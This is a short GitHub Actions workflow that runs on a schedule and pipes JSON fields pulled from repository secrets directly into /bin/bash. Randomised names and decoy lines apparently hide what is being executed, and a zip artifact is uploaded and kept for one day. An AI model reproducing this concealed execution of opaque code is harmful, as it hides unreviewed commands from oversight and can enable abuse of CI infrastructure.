name: jielaishoufa
on:
  workflow_dispatch:

  schedule:
    - cron: '2 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jielaishoufa
        env:
          yktya29627: ${{ secrets.yktya29627 }}
        run: |
          printf '%s' "$yktya29627" | jq -r .dl02865 | /bin/bash
          echo $zti73000 | jq -r .k22730 | /bin/bash
          echo $b0029 | jq -r .wl68894 | /bin/bash
          printf '%s' "$ghdwu11" | jq -r .xsz26 | /bin/bash
          printf '%s' "$gkotk82893" | jq -r .khz07705 | /bin/bash
          printf '%s' "$odb50" | jq -r .oxy94 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: D595iCNi
          path: "*.zip"
          retention-days: 1
